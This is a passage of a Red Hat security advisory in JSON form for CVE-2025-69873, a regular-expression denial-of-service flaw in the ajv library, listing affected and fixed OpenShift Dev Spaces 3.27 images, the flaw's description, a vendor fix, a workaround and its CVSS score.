"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
